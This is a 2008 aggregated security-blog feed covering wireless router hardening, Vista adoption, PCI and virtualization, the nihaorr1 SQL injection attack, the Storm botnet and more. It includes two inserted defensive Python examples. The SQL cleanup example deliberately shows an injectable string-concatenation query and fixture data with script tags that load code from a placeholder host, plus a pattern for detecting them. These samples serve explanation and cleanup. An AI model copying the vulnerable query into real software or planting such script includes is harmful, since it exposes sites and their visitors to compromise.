Wednesday, April 30, 2008

Spliced feed for Security Bloggers Network

Wireless modem considerations [Malta Info Security]

Posted: 30 Apr 2008 10:11 AM CDT


I am pretty sure that there are a number of you out there reading this blog over a wireless network. Given that wireless is so widely distributed these days, it's not uncommon that users are unaware of how insecure their wireless setup may be.

Unfortunately, one other reality is that a number of ISPs install wireless modems without setting up any sort of security. What's worse is that if the client doesn't speak up, they don't advise the customer of what could be at risk. Basically, as long as your laptop/device successfully connects to the wireless LAN that is set up for you, they're out of there. SOO - this is where we come in to offer some advice.

If you connect to your wireless router without a password, it's time to get hold of a technician who knows his business and set up some security on it. That's not all...

Recent developments published by Petko D. Petkov reveal some pretty nasty things an attacker can do to Thomson Speedtouch wireless modems - which is what a lot of us Maltese people have at home to connect to the internet.

Thanks to a friend of mine who first pointed out the article above: it is now possible that if an attacker sees your default network name (SSID), he could crack your default password and use your internet connection. Therefore, here are some healthy tips you could pass on to your technician if you're not confident enough to set them yourself.

Use WPA2 encryption rather than WEP/WPA.

Note that this will affect usage of early PDA's wireless and even computers with Windows XP. In fact you will need to download a patch for Windows XP to use WPA2. Also certain old wireless adapters (802.11b) might not have updated drivers, so do your homework to see if your adapter can use WPA2 before you start changing anything.


Change the default network name (SSID)

Change the default name of your router to something else. Invent a name.


Change the default password (preshared key)

If you don't have a password - PUT ONE. If the router is using a default password, it's a good idea to change it, unless you don't mind sharing your internet connection with your neighbours.
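The three tips above can be turned into a check a technician runs against a router's exported settings. The script below is an added example written for this post, not something from Malta Info Security or any router vendor: it parses a flat key=value dump (the format is assumed; real firmware exports differ), then flags WEP/WPA/open encryption, a factory-default SSID (the SpeedTouch-style pattern and the other default names are assumptions) and a missing, default or out-of-range preshared key. The 8 to 63 character rule for a WPA2 passphrase comes from the WPA/802.11i specification.

```python
import re

# Constructed sample dumps of a router's wireless settings (key=value format
# is assumed for this example; real firmware exports look different).
WEAK_CONFIG = """\
ssid=SpeedTouchA1B2C3
security=WEP
psk=
"""

HARDENED_CONFIG = """\
ssid=kestrel-attic
security=WPA2-PSK
psk=correct-horse-battery-staple-2008
"""

# Assumed vendor default SSID patterns (regular expressions). Extend this list
# with the defaults of whatever kit your ISP hands out.
DEFAULT_SSID_PATTERNS = [
    r"^SpeedTouch[0-9A-Fa-f]{6}$",   # Thomson SpeedTouch style name, assumed
    r"^default$",
    r"^linksys$",
    r"^NETGEAR$",
]

# Constructed set of factory passphrases that must never be left in place.
DEFAULT_PASSWORDS = {"", "admin", "password", "1234567890"}


def parse_config(text):
    """Turn a key=value dump into a dict; blank lines and # comments are skipped."""
    cfg = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        cfg[key.strip()] = value.strip()
    return cfg


def audit_wireless(cfg):
    """Return a list of findings, one per tip from the post that is not met.
    An empty list means the three tips are satisfied."""
    findings = []

    # Tip 1: WPA2 rather than WEP/WPA (or no encryption at all).
    security = cfg.get("security", "").upper()
    if not security.startswith("WPA2"):
        findings.append(f"encryption: {security or 'none'} in use; switch to WPA2")

    # Tip 2: the SSID must not be the factory default.
    ssid = cfg.get("ssid", "")
    if not ssid or any(re.match(p, ssid) for p in DEFAULT_SSID_PATTERNS):
        findings.append("ssid: factory default network name; invent your own")

    # Tip 3: a preshared key must exist, not be a default, and be a valid
    # WPA2 passphrase (8 to 63 characters per the WPA/802.11i specification).
    psk = cfg.get("psk", "")
    if psk in DEFAULT_PASSWORDS:
        findings.append("psk: missing or factory default; set a passphrase")
    elif not 8 <= len(psk) <= 63:
        findings.append("psk: WPA2-PSK passphrases must be 8 to 63 characters")

    return findings


if __name__ == "__main__":
    for label, dump in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit_wireless(parse_config(dump)) or ["OK"])
```

Run it against the two constructed dumps and the weak one yields three findings while the hardened one yields none; drop your own router's settings into the same key=value shape to get the same report.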



It’s ironic! It seems only Microsoft in the world likes to migrate to Vista [Telecom,Security & P2P]

Posted: 30 Apr 2008 05:03 AM CDT

ZDNet reports that HP and Lenovo have joined Dell in extending Windows XP. It’s very ironic! It’s also interesting. Why does Microsoft want to push everyone onto software that most customers and partners dislike or even hate? Meanwhile, why does a brand-new OS that Microsoft spent billions of dollars to develop get no acceptance from users?

This is not just because of the higher hardware resources Vista needs. Today, 1GB of memory costs less than $20. It’s very cheap. The real reason is that users cannot find a reason to upgrade. They just cannot convince themselves or the board.

A few days ago, Microsoft released Windows XP SP3 and Vista SP1. According to web reports, Vista SP1’s performance has not improved, while XP SP3 is more satisfying to most users. That’s the point.

Below is the ZDNet report.

Rumors of Windows XP's demise have been greatly exaggerated.
I wrote about Dell's downgrade program in a post earlier this week (Windows Vista just can't catch a break). It looks like Dell may have started something. Both HP and Lenovo now plan to offer Windows XP to business customers after Microsoft's official cut-off date of June 30.
Lenovo will provide a Windows XP recovery disc with systems so that users can downgrade from Windows Vista until January 31, 2009, according to Information Week. The downgrade program covers laptops and desktops with Vista Business or Ultimate.
HP said it will offer Windows XP to business customers for an unspecified time beyond June 30.
Dell's program covers OptiPlex desktops and laptops, Latitude laptops, and Precision workstations. Those systems come with Windows XP pre-installed but include a copy of Vista Business or Ultimate so customers can upgrade when they are ready. The Vostro desktops and laptops for small and medium-size businesses, and some XPS gaming systems, will also continue to offer the downgrade service for a fee.
Though it has been widely reported that the Dell downgrade option would be good through 2010, (when Microsoft is set to release Windows 7) Dell now says the program will last as long as "Microsoft supports it," according to Information Week.
This comes after CEO Steve Ballmer suggested earlier this week that Microsoft might change its mind and extend Windows XP if customers asked for it. But he said the majority of new systems ship with Vista, and so far they haven't seen customers asking for Windows XP.
Not everyone is convinced. Microsoft reported quarterly earnings on Thursday and revenues in the client division fell a little short, which The New York Times' Steve Lohr writes could be a sign the company has a problem with Vista. Meanwhile InfoWorld Editor-in-Chief Eric Knorr has collected more than 160,000 signatures for his Save Windows XP petition (complete with countdown clock).
Microsoft has already announced that Windows XP will continue to be available specifically for ultra low-cost systems that do not meet the system requirements for Vista.
John Morris is a former executive editor at CNET Networks and senior editor at PC Magazine. See his full profile and disclosure of his industry affiliations.


All Your Virtualized PCI Compliance Are Belong To Us... [Rational Survivability]

Posted: 30 Apr 2008 12:13 AM CDT

Another interesting example I use in my VirtSec presentations when discussing the challenges of what I describe as Phase 2 of virtualization -- virtualizing critical applications and things like Internet-facing infrastructure in DMZ's -- is the notion of compliance failures based on existing and upcoming revisions to regulatory requirements.

Specifically, I use PCI/DSS to illustrate that in many cases were one to take a highly-segmented and stratified "defense-in-depth" architecture that is today "PCI compliant" and virtualize it given presently available options, you'd likely find yourself out of compliance given the current state of technology solutions and auditing standards used to assess against.

Then again, you might just pass with flying colors while being totally insecure.

Here's a fantastic example from Eric Siebert over at the TechTarget Virtualization blog.  Check this out, it's a doozie!

Having just survived another annual PCI compliance audit, I was again surprised that the strict standards for securing servers that must be followed contain nothing specific concerning virtual hosts and networks. Our auditor focused on guest virtual machines (VMs), ensuring they had up-to-date patches, locked-down security settings and current anti-virus definitions. But ironically, the host server that the virtual machines were running on went completely ignored. If the host server was compromised, it wouldn't matter how secure the VMs were because they could be easily accessed. Host servers should always be securely locked down to protect the VMs which are running on them.

It seems that much of the IT industry has yet to react to the virtualization trend, having been slow in changing procedures to adjust to some of the unconventional concepts that virtualization introduces. When I told our auditor that the servers were virtual, the only thing he wanted to see was some documentation stating that the remote console sessions to the VMs were secure. It's probably just a matter of time before specific requirements for virtual servers are introduced. In fact, a recent webinar takes up this issue of whether or not virtualized servers can be considered compliant, addressing section 2.2.1 of the PCI DSS which states, "Implement only one primary function per server"; that is to say, web servers, database servers and DNS should be implemented on separate servers. Virtual servers typically have many functions running on a single physical server, which would make them noncompliant.

So let's assume that what Eric talks about in section 2.2.1 of PCI/DSS holds true, that basically means two things: (1) PCI/DSS intimates that virtualization cannot provide the same level of security as non-virtualized infrastructure and (2) you won't be able to virtualize infrastructure governed by PCI/DSS if you expect to be compliant.

Now, this goes toward the stuff Mogull and I were talking about in terms of assessing risk and using the notion of "zone defense" for asset segmentation in virtualized infrastructure. 

Here's a snippet from my VirtSec preso on the point:

Further, as I mentioned in my post titled "Risky Business -- The Next Audit Cycle: Bellweather Test for Critical Production Virtualized Infrastructure," this next audit cycle is going to be interesting for many companies...

Yippeee!

/Hoff

Check Point Admin Rot [BumpInTheWire.com]

Posted: 29 Apr 2008 11:02 PM CDT

My brain is fried.  The first two days of this week have been brutal.  It started out wonderfully yesterday morning when the SSL certificate for our Check Point SmartCenter console expired over the weekend.  I’ve spent a good chunk of both days dealing with that.  The management server is an old Windows 2000 Server box that has been upgraded from NG to NG R55 to NGX R60.  Now it’s a paperweight.  TB threw out that maybe it was a result of “Windows rot,” and I think it’s a result of “Check Point admin rot.”  I’m not afraid to admit that my knowledge of exactly how Check Point’s inner workings go together is not that good.  I’m learning though!  School of hard knocks.

Speaking of something else I’m not that knowledgeable about: QoS.  But that too I am learning…from that same school!  The school of hard knocks.  A local Cisco SE was out today to go over a few things regarding our infrastructure and I ran something by her regarding QoS.  That was a mistake for my current mental capacity.  She might as well have been speaking Portuguese to me.  I had to jump off the Check Point train and jump on the QoS train.  The University of Google is a much easier school than that hard knocks university!  So the brain smokes while I sit in a chair yearning for a life less complicated.  Feel sorry for me?  Didn’t think so.  I wouldn’t either.

Clouding the Issue: Separating "Securing Virtualization" from "Virtualizing Security" [Rational Survivability]

Posted: 29 Apr 2008 10:09 PM CDT

My goal in the next couple of posts is to paint some little vignettes highlighting some of the more interesting points I raise in my presentation series "Virtualization: Floor Wax, Dessert Topping and the End Of Information Security As We Know It."

The first issue up for discussion is the need to recognize and separate two concerns which are unfortunately most often intertwined when companies are considering virtualization and its impact to their IT operations and security programs. 

My goal here is not to try and explain away every nuance of this slide or push a conclusion on anybody, but instead plant the seeds and set the premise for discussion's sake.

The slide to the left sums up the point reasonably well, but here's the associated scaled-down narrative that accompanies this slide:

Companies need to approach addressing each of these issues by assessing the risk associated with each separately and then juxtaposed.

Treating them as a single concern -- as most do -- leads to an unfortunate series of chicken-egg debates that usually do not address the things that really matter in the first place.

The point here is that while these concerns are very much related and both important, the order in which they are addressed is often critical.

Specifically, one can take an incredibly secure solution and yet still manage to deploy it in an incredibly insecure manner.  Even if the virtualization platform one chooses is (by some mythical standard) impervious to compromise (*cough*,) given specific configuration constraints, deviations from those constraints can lead to exposure.

If the manner in which virtualization platforms are configured, managed, monitored and secured after you've already deployed them are not consistent with the rigor and diligence we've applied to our non-virtualized infrastructure (and by observation they are not,) worrying about how secure or insecure your VMM platforms are is a waste of synaptic processes.

My experience has shown that most organizations have simply plowed ahead and accepted or ignored the risk associated with deploying virtualization platforms, accepting on blind faith the claims of virtualization vendors and assuming that the VMM providing the abstraction layer between hardware and software is at least as secure (if not more so) as a non-virtualized installation of the operating system.

This is usually done because the economic benefits of virtualization which are absolutely quantifiable far outweigh the perceived risks associated with virtualization which are not (or are at least difficult to produce.)

I'm unsure how exactly most companies are assessing risk against their virtualized environments formally since many of them admit to not having a risk assessment methodology in place to do so.

It would seem that most folks simply look at the known vulnerabilities associated with a vendor's VMM and the current threatscape and make a swag as to the resultant residual risk given any compensating controls that might be in place.  In many cases, however, the "risk" we're debating is based upon threats and vulnerabilities that may not even exist, so we're academically making judgment calls based on possibility versus probability.

Yikes.

How many times have you entered into debate with *someone* in IT, security, audit or the business arguing about "securing virtualization" after someone's seen a "Blue Pill" presentation, when in all honesty the company has already deployed hundreds of VMs and still hasn't segmented the network or built a risk assessment framework to quantify the business impact?

See what I mean?

/Hoff

Off Topic: Southwest Airlines Monitoring Twitter For Customer Service/Brand Protection [Rational Survivability]

Posted: 29 Apr 2008 08:58 PM CDT

Planes, Trains and Automobiles

My Southwest Airlines flight from New Hampshire to Philly yesterday sucked the big one.  Flying into Philly is always a gamble but yesterday I went all in and flew SWA for the first time instead of US Scareways.

My flight was supposed to take off at 5:20 PM.  It actually took off at around 7:45 PM.  Due to "weather," once we arrived over PHL airspace, those of us in the bovine express class then endured 30 minutes of low-earth orbit in a holding pattern awaiting vector approach clearance to land once we got there.

Upon landing, we waited almost 30 minutes for our luggage only to find that they had to go back for a second load since the first wasn't large enough of a sweep to claim them all.  The baggage came...and went.  Mine wasn't amongst them.  It was now 10:30pm.  At this point, one of my VP's who was also traveling to the same locale wisely left.  Cue the violins.

I filed a claim next to a woman who was going apeshit over her drenched and soiled suitcases.  The migrant baggage helper person said that another flight was due in shortly (about 45 minutes) and I could wait to see if it was on that flight.  I made some remark about pitching a pup tent in baggage claim.  I could hear crickets chirping...

This was all friendly and helpful enough.  There was no reason to get medieval as the poor souls behind the counter can't even track bags to tell if they landed -- or so they say.  Upon filing my claim, I asked that my bag just be returned to NH or delivered to my hotel given the fact that I was staying only one night before returning home.  They would try the latter as the last run to "local" hotels was around midnight.

I was prepared for the old fake-finger-teeth-brushing and washcloth-the-armpits routine to get me through my meeting if need be.  Wow.

It was now almost 11pm.  I still had to collect my rental car and drive 45 minutes to my hotel.

As I was walking out, I saw a strange man return my bag to the carousel. I reckoned that if he took it, loaded it with explosives and put it back, that hopefully I would suffer a quick death.  No such luck.

I picked it up and wrung it out.  It was soaked.

I shrugged it off, got the rental and got to my hotel in one piece.

Corporate accounts payable, Nina speaking. Just a moment...

Of course I twittered the entire experience with my normal (lack of) withholding.  I didn't address the tweet to @southwestair or anything, but I obviously mentioned them by name.

This morning I was quite amazed to see that someone (not something) from Southwest was monitoring Twitter feeds and responded to me.  I can tell it isn't a bot because of the responses to the rather colloquial nature of some of my tweets.  Check it out:


The plea to let them try again to earn my loyalty and prove that "Southwest=Awesomeness" came from a statement that "Southwest=Suckage."  ;)

It's pretty interesting that they have people monitoring Twitter for brand/reputation purposes -- it comes across as a customer service effort, also.   I know it's not as profound as some of the remarkable Twitter stories of late, but it was cool.

Cool and frightening at the same time.  So, thanks for the attention, SWA.  We'll see how you do on my return flight today.

Anyone else have an experience such as this?

/Hoff

Update: The flight back was great.  It arrived early, to boot.  I have to say that my Southwest Twitter experience wasn't just a single fire and forget incident as "they" twittered back again to check up on me:


;)

From the Interop 2008 show floor [Napera Networks]

Posted: 29 Apr 2008 08:57 PM CDT

It may not be the halcyon days of the late 90’s when Interop took over the massive Las Vegas Convention Center, but judging from the mood at today’s show the buzz is definitely back at Interop!

NAC is everywhere, and Mike Fratto’s sneak peek of the Information Week Third Annual NAC survey confirms what you can tell by just walking around the show floor - there is a huge amount of interest from customers in NAC solutions, and we’ve had lots of interesting meetings today.

Speaking of Information Week, Andrew Conroy-Murray just published a great profile on Napera, and I recorded a brief video interview with Andrew for TechWeb that should be published shortly. Hopefully you’ll be able to hear us over the Frank Sinatra and Barbra Streisand impersonators crooning in the next booth!

I’m speaking Wednesday at 1pm in the Microsoft booth (1719, right near the main exhibit floor entrance). I can’t croon like Ole Blue Eyes, but stop by and say hello if you have a moment.

Todd, Robin and Cary in a rare serious moment.

EDUCAUSE/Internet2 Security Professionals Conference [Kees Leune]

Posted: 29 Apr 2008 07:41 PM CDT

For those of us in higher education; do not forget that the EDUCAUSE/Internet2 Security Professionals Conference will take place starting this Sunday (May 3). If anyone is going there and would like to meet up, please drop me a note! I'll be getting in Saturday evening around 8pm or so.

Enough About Estonia [RSA Conference - Blog]

Posted: 29 Apr 2008 07:00 PM CDT

PCI App Security, Kraken Hackback Ethical Dilemma, and MS Forensics [The Falcon's View]

Posted: 29 Apr 2008 06:21 PM CDT

I realize that I've been a bit light on infosec subjects lately, so thought that I'd better get back on topic. :) There are three bits out today that I've found particularly interesting. First, more information has been released by...

Blue Box #78: Cisco IP phone vulnerabilities, WiFi handset insecurity, IETF security-related news, VoIP security news, listener comments and more [Blue Box: The VoIP Security Podcast]

Posted: 29 Apr 2008 01:57 PM CDT

Synopsis: Blue Box #78: Cisco IP phone vulnerabilities, WiFi handset insecurity, IETF security-related news, VoIP security news, listener comments and more


Welcome to Blue Box: The VoIP Security Podcast #78, a 40-minute podcast  from Dan York and Jonathan Zar covering VoIP security news, comments and opinions.   

Download the show here (MP3, 17MB) or subscribe to the RSS feed to download the show automatically. 

NOTE: This show was originally recorded on February 25, 2008. Yes, that was two months ago... we know!

Show Content:

Comments, suggestions and feedback are welcome either as replies to this post  or via e-mail to blueboxpodcast@gmail.com.  Audio comments sent as attached MP3 files are definitely welcome and will be played in future shows.  You may also call the listener comment line at either +1-415-830-5439 or via SIP to 'bluebox@voipuser.org' to leave a comment there. 

Thank you for listening and please do let us know what you think of the show.


nihaorr1 attack explained [IT Security: The view from here]

Posted: 29 Apr 2008 11:23 AM CDT

I went and introduced myself to the guys at Secerno again at InfoSec last week, and whilst I have no professional affiliation with them, I'm always interested in exciting technology which does something new. Steve Moyle, CTO, is a friendly guy who oozes enthusiasm, just as Paul Galvas was when I met him last year. I just got a mail from Steve to tell me about a recent attack, and I thought it was so well explained I offered to reproduce it here. Steve agreed, so here goes:

"The nihaorr1 attack trashed web facing databases all over the planet last week. It was based on an automated SQL Injection attack (Secerno stops these). Previous attacks like this were targeted and individual. It was only a matter of time before someone sinister worked out how to automate it. We were working with a victim not long after the outbreak.

In this attack, they were not stealing data. However, for the affected web sites it would be difficult for anyone claiming PCI compliance to show that they had their data under control. The attack can easily be rewritten to take integer values (e.g. credit card numbers) from one field (say) and copy them to a text field, and then expose them on web pages ...

Basically, the attack worked as follows:

Step 1: potentially vulnerable sites identified automatically (probably by a Google query)

Step 2: SQL Injection part 1. SQL injection at a site to ask the database for every field it has that contains text

Step 3: SQL Injection part 2. Update every text item in the database with the original item plus a link that will download a trojan to the web browser

Now what happens is that when a web site serves up a page, the text it serves up is called up from its database -- but every piece of text now has a malicious link under it. When clicked on, the link serves up a virus that infects the viewer of the web page.

Note that the original victim -- the web site -- has become the attacker, whilst the new victim is the website visitor who trusts the site.

This attack will be adapted and will cause real chaos."

Thanks Steve for the entertaining story and explanation of how this attack is working. And, as the Romans say, caveat emptor internettus.
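Two things follow from Steve's three steps for anyone cleaning up after this: the injection only works because page input is spliced into SQL text, and because the attack wrote into every text column of every table, a cleanup sweep has to enumerate the schema the same way rather than eyeball a few pages. The Python below is an added example, not code from Steve, Secerno or the original post. It builds a constructed in-memory SQLite database standing in for a site's database, with a script include of the kind the attack appended planted in two text cells (the host malicious.invalid is a placeholder), shows the string-concatenation query pattern beside its parameterized replacement, then walks every text column, reports the poisoned cells and strips the appended tag with parameterized updates.

```python
import re
import sqlite3

# Signature of the payload the attack appended to stored text: an external
# script include. Constructed pattern; real campaigns vary the tag and host.
INJECTED_SCRIPT = re.compile(r"<script[^>]*\bsrc\s*=", re.IGNORECASE)
FULL_SCRIPT_TAG = re.compile(
    r"<script[^>]*\bsrc\s*=[^>]*>\s*</script\s*>", re.IGNORECASE)


def build_sample_db():
    """Constructed in-memory database standing in for a web-facing site DB.
    Two text cells carry the appended script include (placeholder host)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL, blurb TEXT);
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
    """)
    conn.executemany("INSERT INTO products (name, price, blurb) VALUES (?, ?, ?)", [
        ("Widget", 9.99, "A fine widget."),
        ("Gadget", 19.99,
         'A fine gadget.<script src="http://malicious.invalid/x.js"></script>'),
    ])
    conn.executemany("INSERT INTO articles (title, body) VALUES (?, ?)", [
        ("Hello", "First post."),
        ("News", "Second post.<SCRIPT SRC='http://malicious.invalid/x.js'></SCRIPT>"),
    ])
    conn.commit()
    return conn


def product_by_name_vulnerable(conn, name):
    """The pattern the attack relies on: untrusted input spliced into SQL text.
    Constructed for contrast only; a name containing a quote already breaks it."""
    sql = "SELECT id, name FROM products WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def product_by_name_safe(conn, name):
    """Parameterized form: the driver sends the value separately from the SQL,
    so no input can change the statement's structure."""
    return conn.execute("SELECT id, name FROM products WHERE name = ?", (name,)).fetchall()


def text_columns(conn):
    """Enumerate every text column in the schema (step 2 of the attack did the
    same), so the sweep covers exactly the surface the attack wrote to."""
    cols = []
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%'")]
    for table in tables:
        for _cid, cname, ctype, *_rest in conn.execute(f'PRAGMA table_info("{table}")'):
            if (ctype or "").upper() in ("TEXT", "VARCHAR", "CHAR", "CLOB"):
                cols.append((table, cname))
    return cols


def find_injected(conn):
    """Return (table, column, rowid, value) for each text cell carrying a script
    include. Table and column names come from the schema, never from users; the
    cell values are matched in Python and are never interpolated into SQL."""
    hits = []
    for table, col in text_columns(conn):
        for rowid, value in conn.execute(f'SELECT rowid, "{col}" FROM "{table}"'):
            if isinstance(value, str) and INJECTED_SCRIPT.search(value):
                hits.append((table, col, rowid, value))
    return hits


def strip_injected(value):
    """Remove appended script includes, leaving the original text."""
    return FULL_SCRIPT_TAG.sub("", value)


def clean_database(conn):
    """Rewrite every poisoned cell with the tag removed; returns cells changed."""
    hits = find_injected(conn)
    for table, col, rowid, value in hits:
        conn.execute(f'UPDATE "{table}" SET "{col}" = ? WHERE rowid = ?',
                     (strip_injected(value), rowid))
    conn.commit()
    return len(hits)


if __name__ == "__main__":
    db = build_sample_db()
    for hit in find_injected(db):
        print("poisoned:", hit[:3])
    print("cleaned", clean_database(db), "cells; remaining:", find_injected(db))
```

The sweep reports two poisoned cells, one per table, and the cleanup leaves none; restoring from a pre-attack backup is still the safer route where one exists, since a regex cleanup only removes the payload shape it knows about.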

"The Kite Runner" will change how you think about Afghanistan [StillSecure, After All These Years]

Posted: 29 Apr 2008 11:16 AM CDT

My wife Bonnie and I don't get out to the movies as much as we used to. When we do it is often with the kids, so we miss out on many of the adult (no, I don't mean those kind of adult) themed movies that come out. We wait for the DVD, but even then I miss many. I compensate by watching movies on planes a lot. Recently I caught The Kingdom with Jamie Foxx and We Own the Night with Mark Wahlberg and Joaquin Phoenix. Both good, powerful movies. However, last night on my way out to Vegas for Interop I watched a movie that will change my life. It is The Kite Runner, based on the book of the same title by Khaled Hosseini.

The movie tells the story of two boys growing up in pre-Soviet invasion Kabul, Afghanistan all the way up to the year 2000, with a pre-9/11 Taliban regime in charge. You can read the Wikipedia article I linked to or better yet go rent the movie or read the book (I am going to read it next) for all of the dramatic details. However, let me talk a bit about my take away from this film. First of all, like many Americans I had a preconceived notion of Afghanistan as a poor, backwater, backwards place that welcomed a repressive regime like the Taliban to power and were part of the Muslim world that runs from the Med through to Pakistan. Nothing distinctive and in fact, let's face it, I am not sure we humanize the people who live in that part of the world as we do Europeans or our fellow Americans. I knew little to nothing of Afghan history or lifestyle. Our American view of the world makes it hard for us to remember that children are children the world over and their lives are special. Whether it be something as simple as flying a kite or aspiring to be a writer, all children share the same dreams, hopes and challenges. Yes, in a place like Afghanistan with its ethnic tensions, there is room for a level of violence we don't often see here (but even that is BS; me living in Boca doesn't see it, but live in an inner city bad neighborhood in the US and is life any better for a child?). But parents are parents the world over and they love their children and have hopes for their children the same way you and I do. People have values they believe in and may not be the most religious, but are nevertheless good people.

The movie made me think about my role as a father, husband and American. The whole American immigration experience is such a great influence on the world. We have the ability to take people from anywhere and they become Americans. The father in the movie goes from being a man of power and wealth in Kabul, to working in a gas station here. The father-in-law was a general in Afghanistan, but just a lower middle class worker here. But they don't lose their identity or the pride and sense of who they are and most of all their values. They don't lose their identity into the melting pot, but we add their identities to our tapestry of life here in this country. That is the real special sauce in what makes America

That part of the world is not just full of religious extremists. There are real live human beings there who think and feel very much like we do. Yes, there are incredible challenges with religious extremism to overcome, but there is a core of real people who are worthy of our efforts. At the end of the day, that is what the movie has succeeded in doing for me. It has made the Afghan people real.

Hacking back: Storm Botnet [Birchtree Blog]

Posted: 29 Apr 2008 11:08 AM CDT

Well, there are some ways to counter hackers. Researchers from Mannheim, Germany, used one of them: hacking back.

They are running an attack on the botnet 'Storm'.

"The researchers, from the University of Mannheim and the Institut Eurecom, recently infiltrated Storm to test out a method they came up with of analyzing and disrupting P2P botnets. Their technique is a spinoff of traditional botnet tracking, but with a twist: it not only entails capturing bot binaries and infiltrating the P2P network, but it also exploits weaknesses in the botnet's P2P protocol to inject "polluted" content into the botnet to disrupt communication among the bots, as well as to study them more closely."

Botnets in general are used to generate a net of connected "hacked" computers that will execute tasks for their 'masters'. In general they are used to send e-mail spam. The users of these computers are usually unaware of this abuse of their machines.

via Researchers Infiltrate and 'Pollute' Storm Botnet - Desktop Security News Analysis - Dark Reading

New Blue Box shows coming soon... [Blue Box: The VoIP Security Podcast]

Posted: 29 Apr 2008 09:44 AM CDT

My apologies for the long delay... we haven't "podfaded". We have several main shows recorded that I'm hoping to get out this week and I've got a host of volunteers ready to help with getting some of our backlog of "Special Edition" shows out... I just have to put the pieces in place so that those volunteers can help! Unfortunately, the process of buying a new home and selling our existing home has severely hit my available time and that's the primary reason for the delays. Within the next month or so that should hopefully all wind down and I can resume the regular activity....

Thanks for your patience!

The road ahead [IT Security: The view from here]

Posted: 29 Apr 2008 07:10 AM CDT

With user security, CIA (or AAA as it becomes) is fully integrated. This is an area of security which has been around since computers were first invented, to some degree. It is the most mature of the 3 areas I have picked out in my series of posts so far. [Although please note, these are only picked out for sake of ease, in reality there are overlaps.] Network security is less integrated, although in my career I have watched as point solutions in the network have become more fully integrated. Network devices at least all talk the same language to each other now, TCP/IP as a standard form of communication has kind of settled in.

With data we are not quite so fortunate, C, I and A are not integrated, although large storage companies are trying. There are a few of these though, so they all have their own standards.

In my original piece I said that integrity was the future of data security, and indeed, it will be an important part of every piece of storage eventually, when everyone realises its importance - but that's not a great starting position. I don't think it will be a point solution that becomes part of a data security standard. Integrity will always be an option, along with encryption and compression as the whole data centric security space merges and evolves.

This will happen separately from hardware as well as being built in to it. But will the standards emerge from the hardware, or something distinct and separate from the hardware that the information resides on?

Data-centric security has to be able to move with the data. Anything that the large storage companies try to apply directly into hardware will be difficult to use at best, more likely ignored. We've already seen a big pull and push between Sun, IBM, etc. in trying to standardise key management. If they can't even agree on that, where keys are already in reasonably standard formats, what chance do they have on agreeing on compression, encryption and integrity standards? It is more likely they will pick up and use existing popular methods over time as happened in the network.

I don't want this to become too much of an advert, but I spoke recently about PKWare, because I am interested in them, and will be visiting them this week. I'm going to talk with them about their products in more detail, but they sound very close to my heart, and as close to the reality of reaching my data security nirvana that I've actually seen. What's more, it makes sense.

I've heard some very interesting things about them recently, their new SecureZIP line, and PartnerLink are both areas I identified as being massive opportunities for growth whilst at my previous job. I actually asked our engineers about designing a product almost identical to PartnerLink, but it was too much for our small team. We didn't have the resources to develop the ideas, but now I find those ideas already exist.

Ask anyone (as I did at InfoSec) whether they've heard of PKWare and they will often look blank, until you say "have you ever used PKZIP?", which of course everyone has at some point, if they've used a computer for anything other than emails. I'll be asking some more searching questions this week and reporting back in due course.

Intentional Security Blindness [BlogInfoSec.com]

Posted: 29 Apr 2008 06:00 AM CDT

In previous columns I talked about two types of employees, contractors, and the like who could cause your organization harm through poor security practices resulting in loss of data, money, or trade secrets, etc. The first type was people who caused such losses inadvertently through security policy violations, such as taking unencrypted medical records home on a laptop or memory stick and losing it. The second type was someone who intentionally stole such valuable data or caused a denial of service, which in both cases had potentially significant cost to your company in terms of money, lost business, or management time lost to litigation. But there is a third type of individual who could cause these undesirable losses to your company, and they are almost always employees.

Who are they?

So who are these people? Generally, they are the most powerful or influential people in your company who often are higher up in the corporate hierarchy than the security department. They could be the CEO, the CFO, the head of marketing, or the powerful heads of profit centers. So what do they do and why do they do it?

What do they do?

First, the what. They demand new or modified applications that open up serious security flaws, for example by web-enabling legacy applications that were never designed with security in mind beyond authenticating a user, which is, of course, anyone with a web browser. A very good example of this has occurred in the electric power industry, whose systems are controlled by a technology called SCADA (System Control and Data Acquisition). SCADA was intended for use in closed company systems and so has little built-in security. However, over time, SCADA systems have been opened to the internet, which poses a significant threat to the nation's grid systems. Alternatively, they may demand new applications such as Web 2.0 mash-ups or Voice over IP (VoIP), to name a couple. These applications are inherently insecure, as any review of the security literature will reveal. Not only are they insecure, but they are exceedingly difficult to provide with an acceptable degree of security. Now, if the security department is performing its role, the people demanding these applications would be aware of the security issues. But in many cases, the security people are not high up enough in the organization to be heard, or even if they are, their message is ignored.

Why do they do it?

Now the Why. In a word – money. These new applications are seen as increasing revenue or reducing operating costs by opening up applications to the web. In addition, they may be seen to enable the business to become more nimble. Finally, they may be needed because the competition has such applications or the customers are demanding them. Because of the perceived financial gain, the executives will turn a blind eye to the security implications of these applications, or simply say "You're the security department, fix it."

What do we do?

So in the end, the security people try to make the best of it by finding security solutions that address the most serious of the security exposures and simply accept the rest. So how do we reduce "Security Blindness?" The best way is to achieve a position in the organization where the executive requesting these applications has to accept the residual risk (in writing) rather than the security group.


Copyright © 2008 BlogInfoSec.com. This feed is copyrighted by bloginfosec.com. The feed may be syndicated only with our permission. If you feel that this feed is being syndicated by a website other than through us or one of our partners, please contact bloginfosec.com immediately at copyright()bloginfosec.com. Thank you! Again, please contact copyright@bloginfosec.com so we can take legal action immediately.

1st Pacific Rim Regional Collegiate Cyber Defense Competition [Napera Networks]

Posted: 28 Apr 2008 08:30 PM CDT

Napera was proud to be a sponsor of the 1st Pacific Rim Regional Collegiate Cyber Defense Competition held this weekend at the Microsoft campus. For ChrisB and me, it was a rare opportunity to see students in action in a highly technical scenario, and we were both impressed by the levels of skill on display as they defended their network from the Red Team. Special props go to the team from the University of Washington Computer Science & Engineering for taking the top score.

I’m sure everyone who participated is already on their way to a promising career in information security. As I mentioned to several people at the event, Napera has intern and full time positions open and we welcome inquiries at careers@napera.com.

All eyes were on screens as the competition started Saturday morning.

My opinion of John Thompson [An Information Security Place]

